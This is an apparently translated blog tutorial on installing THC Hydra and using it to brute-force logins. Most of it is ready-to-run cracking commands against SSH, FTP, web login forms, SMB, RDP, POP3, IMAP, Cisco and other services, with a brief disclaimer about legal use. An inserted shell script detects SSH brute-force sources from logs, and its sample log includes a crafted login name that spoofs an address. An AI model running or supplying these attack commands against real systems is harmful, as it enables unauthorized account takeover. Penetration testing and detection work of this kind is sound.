
Hydra installation and use

2022-06-22 16:56:00 MarshalEagle

Description:
hydra is an open-source brute-force password cracking tool from the well-known hacker group THC; it can crack many kinds of passwords online. Official website: http://www.thc.org/thc-hydra. It supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP, among others.
This brute-force password cracking tool is quite powerful and supports online password cracking for almost all protocols; whether a password can be cracked depends on whether the dictionary is strong enough. In social-engineering penetration work it can sometimes get twice the result with half the effort. This article discusses testing only from a security perspective; do not use it for illegal purposes.

Installation:
1. Install the dependency packages with yum

# yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel




2. Compile and install hydra

# cd /usr/local/src
# wget https://www.thc.org/releases/hydra-7.4.2.tar.gz
# tar zxf hydra-7.4.2.tar.gz
# cd hydra-7.4.2

# ./configure
# make
# make install

./configure checks which components are present on the current system, mainly to determine which cracking modules can be supported. Install the corresponding support libraries and dependency packages as required.




Parameters:

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R  Resume cracking from the previous progress.
-S  Use an SSL connection.
-s PORT  Specify a non-default port.
-l LOGIN  Specify the user to crack; targets one specific user.
-L FILE  Specify a user name dictionary.
-p PASS  Lowercase: specify a single password to try. Rarely used, since a password dictionary is usually used instead.
-P FILE  Uppercase: specify a password dictionary.
-e ns  Optional extra checks. n: try an empty password; s: try the specified user name as the password.
-C FILE  Use a colon-separated format, for example "login:password", instead of the -L/-P parameters.
-M FILE  Specify a file listing the targets, one per line.
-o FILE  Specify the result output file.
-f  After using the -M parameter, stop cracking when the first login name/password pair is found.
-t TASKS  Number of threads running at the same time; the default is 16.
-w TIME  Set the maximum timeout in seconds; the default is 30s.
-v / -V  Show the detailed process.
server  The target IP.
service  Specify the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, etc.
OPT  Optional.

 
Usage:
1. Manually create a user name dictionary and a password dictionary. This is just for demonstration, so only a few user names and weak passwords are added. For real cracking, you need a password dictionary generator to produce a strong dictionary.


2. Crack ssh:
# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh

When the crack succeeds, the result is displayed directly. You can also use the -o option to specify a result output file.
# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
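
Seen from the target host, the ssh run above is a stream of failed password logins from one source address. The script below is an added example, not part of the original article: it counts failures and distinct login names per source in sshd log lines. The sample log is constructed, the function names are hypothetical, and the classic syslog line layout is assumed.

```shell
#!/bin/sh
# Added example: summarize failed SSH password logins per source address.

# Constructed sample in the classic syslog layout written by OpenSSH sshd.
# The fourth line carries a login name that itself contains "from <address>".
sample_log() {
cat <<'EOF'
Jun 22 16:50:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 40112 ssh2
Jun 22 16:50:04 host sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 40118 ssh2
Jun 22 16:50:07 host sshd[1205]: Failed password for root from 203.0.113.7 port 40124 ssh2
Jun 22 16:50:10 host sshd[1207]: Failed password for invalid user x from 192.0.2.99 port 1 from 203.0.113.7 port 40130 ssh2
Jun 22 16:50:13 host sshd[1209]: Failed password for invalid user test from 203.0.113.7 port 40136 ssh2
Jun 22 16:52:40 host sshd[1300]: Failed password for alice from 198.51.100.20 port 51514 ssh2
Jun 22 16:52:48 host sshd[1300]: Accepted password for alice from 198.51.100.20 port 51514 ssh2
EOF
}

# Usage: flag_bruteforce_sources THRESHOLD < logfile
# Prints "source failures distinct_logins" for each source at or above THRESHOLD.
flag_bruteforce_sources() {
    awk -v threshold="$1" '
    NF >= 13 && $5 ~ /^sshd\[/ && $6 == "Failed" && $7 == "password" &&
    $8 == "for" && $(NF-4) == "from" && $(NF-2) == "port" {
        # Read the address from the END of the line: the login name is
        # client-controlled and may itself contain " from 192.0.2.99 port 1".
        ip = $(NF-3)
        start = ($9 == "invalid" && $10 == "user") ? 11 : 9
        user = ""
        for (i = start; i <= NF - 5; i++) user = user (i > start ? " " : "") $i
        fails[ip]++
        if (!((ip, user) in seen)) { seen[ip, user] = 1; logins[ip]++ }
    }
    END {
        for (ip in fails)
            if (fails[ip] >= threshold) print ip, fails[ip], logins[ip]
    }' | sort
}

# Report sources with three or more failed logins in the sample.
sample_log | flag_bruteforce_sources 3
```

Because the run above uses -t 1, the failures arrive one at a time, so count them over a long window rather than relying on a per-second rate.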


Other examples:

1. Crack ssh
# hydra -l username -P password_dict -t threads -vV -e ns ip ssh
# hydra -l username -P password_dict -t threads -o save.log -vV ip ssh

 
2. Crack ftp:

# hydra ip ftp -l username -P password_dict -t threads -vV
# hydra ip ftp -l username -P password_dict -e ns -vV
(The number of threads defaults to 16.)

 
3. GET submission, crack a web login:

# hydra -l username -P password_dict -t threads -vV -e ns ip http-get /admin/
# hydra -l username -P password_dict -t threads -vV -e ns -f ip http-get /admin/index.php

 
4. POST submission, crack a web login:

# hydra -l username -P password_dict -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
(Parameter description: -t sets the number of simultaneous threads to 3, -l sets the user name to admin, the dictionary is pass.txt, results are saved to out.txt, -f stops as soon as a password is cracked, 10.36.16.18 is the target IP, http-post-form means the crack uses HTTP POST form submission, and the content in <title> is the message the server returns for a wrong guess.)

 
5. Crack https:

# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

 
6. Crack teamspeak:

# hydra -l username -P password_dict -s port -vV ip teamspeak

 
7. Crack cisco:

# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

 
8. Crack smb:

# hydra -l administrator -P pass.txt 10.36.16.18 smb

 
9. Crack pop3:

# hydra -l muts -P pass.txt my.pop3.mail pop3

 
10. Crack rdp:

# hydra ip rdp -l administrator -P pass.txt -V

 
11. Crack http-proxy:

# hydra -l admin -P pass.txt http-proxy://10.36.16.18

 
12. Crack imap:

# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

This tool is far more capable than the tests above show. Whether a password can be cracked depends on having a strong dictionary. In social-engineering penetration work it can sometimes get twice the result with half the effort.

 
Appendix: installation errors
Appendix 1: hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory
On Ubuntu, simply running apt-get install cmake libssl-dev is enough. But my system is CentOS, where I could not find libssl-dev, so I compiled libssh manually:

# yum install cmake
# cd /usr/local/src
# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
# tar zxf libssh-0.4.8.tar.gz
# cd libssh-0.4.8
# mkdir build
# cd build
# cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
# make
# make install
# /sbin/ldconfig  // This step must be run; otherwise you get hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory



# tar zxf hydra-7.4.2.tar.gz
# cd hydra-7.4.2
# ./configure
# make
# make install

 

Copyright notice
This article was written by [MarshalEagle]. Please include the original link when reposting. Thanks.
https://yzsam.com/2022/173/202206221525110180.html